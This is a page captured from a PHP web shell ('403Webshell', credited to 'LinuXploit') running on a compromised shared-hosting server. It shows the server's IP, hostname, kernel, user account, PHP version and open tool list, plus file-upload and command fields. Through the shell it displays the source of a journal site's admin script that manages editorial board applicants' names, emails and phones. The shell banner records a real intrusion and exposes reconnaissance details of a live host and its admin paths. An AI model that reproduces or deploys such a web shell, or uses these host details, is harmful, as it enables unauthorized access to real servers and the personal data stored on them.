403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/public_html/patholjournal.com/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/akhilnew/public_html/patholjournal.com/admin/boardrequest.php
<?php
if(($opt1) && ($opt1 === 'add' || $opt1 === 'view')):
	$stmt = $mysqli->prepare("SELECT $firstcol, category, name, degree, post, content, email, phone, picture, resume, creation FROM $table WHERE $firstcol = ? LIMIT 1") or die($mysqli->error);
	$stmt->bind_param('i', $opt2);
	$stmt->execute();
	$stmt->store_result();
	$count_rows = $stmt->num_rows();
	$stmt->bind_result($id, $category, $name, $degree, $post, $content, $email, $phone, $picture, $resume, $creation);
	$stmt->fetch();
	$stmt->close();
	if($count_rows == 1):
		if($opt1 === 'view'):
			if(($picture && file_exists($boardfileuploadpath . $picture))):
				$picture = '<img src="'.$boardfiledir.$picture.'" alt="'.$name.'" class="image-round" />';
			else:
				$picture = '<img src="'.$imageurl.'avatar_2x.png" alt="'.$name.'" class="image-round" />';
			endif;

			if(($resume && file_exists($boardfileuploadpath . $resume))):
				$resume = '<a href="'.$boardfiledir.$resume.'" class="action" target="_blank">Download Resume</a>';
			else:
				$resume = '';
			endif;
			$delete = delete($id);
			$creation = dateformat($creation, true);
echo <<<EOJ
			<input type="hidden" name="dataid" value="{$id}" readonly="readonly" />
			<div class="head">
				{$back}{$delete}
				<input type="submit" value="" class="action ico download" onclick="setopt(this, 'downloadfiles')" />
				<input type="button" value="add" class="action g" onclick="gourl('add/{$id}')" />
			</div>
			<table border="0" cellpadding="0" cellspacing="0" class="table view">
				<tbody>
				<tr><th>Data ID</th><td>&num;{$id}</td>
				<tr><th>Category</th><td>{$category}</td>
				<tr><th>Name</th><td>{$name}</td>
				<tr><th>Degree</th><td>{$degree}</td>
				<tr><th>Post</th><td>{$post}</td>
				<tr><th>Email ID</th><td>{$email}</td>
				<tr><th>Phone</th><td>{$phone}</td>
				<tr><th>Content</th><td>{$content}</td>
				<tr><th>Picture</th><td>{$picture}</td>
				<tr><th>Creation</th><td>{$creation}</td>
				</tr>
				</tbody>
			</table>
EOJ;
		elseif($opt1 === 'add'):
			function category_list(){
				global $mysqli;
				$list = '';
				$stmt = $mysqli->prepare("SELECT TRIM(category) FROM editors GROUP BY TRIM(category) ORDER BY TRIM(category) ASC") or die($mysqli->error);
				$stmt->execute();
				$stmt->bind_result($ecategory);
				while($stmt->fetch()):
					$list .= ($ecategory) ? '<option value="' . $ecategory . '">' . $ecategory . '</option>' : NULL;
				endwhile;
				$stmt->close();
				return $list;
			}
			$category_list = category_list();
			function subcategory_list(){
				global $mysqli;
				$list = '';
				$stmt = $mysqli->prepare("SELECT TRIM(subcategory) FROM editors GROUP BY TRIM(subcategory) ORDER BY TRIM(subcategory) ASC") or die($mysqli->error);
				$stmt->execute();
				$stmt->bind_result($subcategory);
				while($stmt->fetch()):
					$list .= ($subcategory) ? '<option value="' . $subcategory . '">' . $subcategory . '</option>' : NULL;
				endwhile;
				$stmt->close();
				return $list;
			}
			$subcategory_list = subcategory_list();
			$name = str_replace('\"', '', strip_tags($name));
			$name = preg_replace('/[!?,.](?![!?,.\s])/', '$0 ', $name);
			$name = htmlentities($name, ENT_QUOTES);
			$name = mb_convert_case($name, MB_CASE_TITLE, "UTF-8");
			$name = stripslashes(stripcslashes($name));
			$post = str_replace('\"', '', strip_tags($post));
			$post = preg_replace('/[!?,.](?![!?,.\s])/', '$0 ', $post);
			$post = htmlentities($post, ENT_QUOTES);
			$post = mb_convert_case($post, MB_CASE_TITLE, "UTF-8");
			$post = preg_replace_callback('/[a-zA-Z]+/', 'change_case', $post);
			$post = stripslashes(stripcslashes($post));
			$content = str_replace('\"', '', strip_tags($content));
			$content = preg_replace('/[!?,.](?![!?,.\s])/', '$0 ', $content);
			$content = htmlentities($content, ENT_QUOTES);
			$content = preg_replace_callback('/[a-zA-Z]+/', 'change_case', $content);
			$content = stripslashes(stripcslashes($content));
echo <<<EOJ
			<input type="hidden" name="dataid" value="{$id}" readonly="readonly" />
			<div class="head">
				{$back}
				<input type="reset" value="reset" class="action" />
				<input type="submit" value="submit" class="action b" />
			</div>
			<div class="body">
				<div class="row">
					<div class="fl">
						<label class="flbl">Category :<span class="fr">*</span></label>
						<input type="text" name="category" value="{$category}" class="field" style="width:50%" />
						<select name="categorylist" class="field field-select" style="width:50%;clear:none" onchange="this.form.category.value = this.value;">
							<option value="" selected="selected">Select Category</option>
							{$category_list}
						</select>
					</div>
					<div class="fr">
						<div class="fl">
							<label class="flbl">Sub Category :<span class="fr">*</span></label>
							<input type="text" name="subcategory" value="{$subcategory}" class="field" />
						</div>
						<div class="fr">
							<label class="flbl">Sub Category List :</label>
							<select name="subcategory_list" class="field" onchange="this.form.subcategory.value=this.value;">
								<option value="" selected="selected">Select Sub Category</option>
								{$subcategory_list}
							</select>
						</div>
					</div>
				</div>
				<div class="row">
					<label class="flbl">Editor Name :<span class="fr">*</span></label>
					<input type="text" name="name" value="{$name}" class="field" />
				</div>
				<div class="row">
					<div class="fl">
						<label class="flbl">Degree :</label>
						<input type="text" name="degree" value="{$degree}" class="field" />
					</div>
					<div class="fr">
						<label class="flbl">Post :</label>
						<input type="text" name="post" value="{$post}" class="field" />
					</div>
				</div>
				<div class="row">
					<label class="flbl">Content :<span class="fr">*</span></label>
					<input type="text" name="content" value="{$content}" class="field" />
				</div>
				<div class="row">
					<div class="fl">
						<label class="flbl">Email :</label>
						<input type="text" name="email" value="{$email}" class="field" style="width:86%" />
						<div class="rw" style="float:right;margin:0px"><label><input type="checkbox" name="emailshow" value="1" checked="checked" />show</label></div>
					</div>
					<div class="fr">
						<label class="flbl">Phone :</label>
						<input type="text" name="phone" value="{$phone}" class="field" style="width:86%" />
						<div class="rw" style="float:right;margin:0px"><label><input type="checkbox" name="phoneshow" value="1" checked="checked" />show</label></div>
					</div>
				</div>
				<div class="row">
					<div class="rw">
						<label><input type="checkbox" name="sendsms" value="Y" checked="checked" />send sms</label>
					</div>
					<div class="rw">
						<label><input type="checkbox" name="sendemail" value="Y" checked="checked" />send email</label>
					</div>
					<div class="rw">
						<label><input type="checkbox" name="certificate" value="Y" checked="checked" onclick="if(this.checked)this.form.sendemail.checked=true;" />send certificate</label>
					</div>
					<div class="rw">
						<label><input type="checkbox" name="status" value="enabled" checked="checked" />status</label>
					</div>
				</div>
			</div>
EOJ;
		endif;
	else:
		echo 'Invalid data selection.';
	endif;
else:
	$keyword = "%$keyword%";
	if($opt1 === 'search'):
		$stmt = $mysqli->prepare("SELECT * FROM $table WHERE (name LIKE ? OR degree LIKE ? OR post LIKE ? OR content LIKE ? OR email LIKE ? OR phone LIKE ?)") or die($mysqli->error);
		$stmt->bind_param('ssssss', $keyword, $keyword, $keyword, $keyword, $keyword, $keyword);
		$stmt->execute();
		$stmt->store_result();
		$total_rows = $stmt->num_rows();
		$stmt->close();
	else:
		$stmt = $mysqli->prepare("SELECT * FROM $table") or die($mysqli->error);
		$stmt->execute();
		$stmt->store_result();
		$total_rows = $stmt->num_rows();
		$stmt->close();
	endif;

	$pagination = pagination($total_rows, $page_number, $item_per_page);
echo <<<EOJ
	<div class="head">
		<input type="submit" value="" class="action ico delete hidden" onclick="setopt(this, 'delete', 'Do you really want to delete?')" />
		<input type="submit" value="download emails" class="action" onclick="setopt(this, 'downloademails')" />
		<div class="fr">{$pagination}</div>
	</div>
	<table border="0" cellpadding="0" cellspacing="0" class="table">
		<thead>
		<tr>
		<th align="center" valign="middle" class="xs"><input type="checkbox" name="select_all" id="select_all" value="" /></th>
		<th align="center" valign="middle" class="xs">s. no.</th>
		<th align="center" valign="middle" class="xs">picture</th>
		<th align="left" valign="middle">name</th>
		<th align="left" valign="middle">email</th>
		<th align="left" valign="middle">phone</th>
		<th align="right" valign="middle" class="md">creation</th>
		<th align="center" valign="middle" class="sm">action</th>
		</tr>
		</thead>
		<tbody>
EOJ;
		if($opt1 === 'search'):
			$stmt = $mysqli->prepare("SELECT $firstcol, name, email, phone, picture, creation FROM $table WHERE (name LIKE ? OR degree LIKE ? OR post LIKE ? OR content LIKE ? OR email LIKE ? OR phone LIKE ?) ORDER BY $firstcol DESC LIMIT $page_position, $item_per_page") or die($mysqli->error);
			$stmt->bind_param('ssssss', $keyword, $keyword, $keyword, $keyword, $keyword, $keyword);
		else:
			$stmt = $mysqli->prepare("SELECT $firstcol, name, email, phone, picture, creation FROM $table ORDER BY $firstcol DESC LIMIT $page_position, $item_per_page") or die($mysqli->error);
		endif;
		$stmt->execute();
		$stmt->store_result();
		if($stmt->num_rows() > 0):
			$stmt->bind_result($id, $name, $email, $phone, $picture, $creation);
			while($stmt->fetch()):
				$snum = ($page_number == 1) ? $snum + 1 : $page_position++ + 1;
				if(($picture && file_exists($boardfileuploadpath . $picture))):
					$picture = '<img src="'.$boardfiledir.$picture.'" alt="'.$name.'" class="image-round" />';
				else:
					$picture = '<img src="'.$imageurl.'avatar_2x.png" alt="'.$name.'" class="image-round" />';
				endif;
				$creation = dateformat($creation);
echo <<<EOJ
				<tr>
				<td align="center" valign="middle"><input type="checkbox" name="dataid[]" value="{$id}" class="checkbox" /></td>
				<td align="center" valign="middle">{$snum}</td>
				<td align="center" valign="middle">{$picture}</td>
				<td align="left" valign="middle">{$name}</td>
				<td align="left" valign="middle">{$email}</td>
				<td align="left" valign="middle">{$phone}</td>
				<td align="right" valign="middle">{$creation}</td>
				<td align="center" valign="middle">
					<button type="button" onclick="gourl('add/{$id}')">add</button>
					<button type="button" onclick="gourl('view/{$id}')">view</button>
				</td>
				</tr>
EOJ;
			endwhile;
			$stmt->close();
		else:
			echo '<tr><td align="center" valign="middle" colspan="8">' . $emptyrows . '</td></tr>';
		endif;
	echo '</tbody>';
	echo '</table>';
endif;
?>

Youez - 2016 - github.com/yon3zu
LinuXploit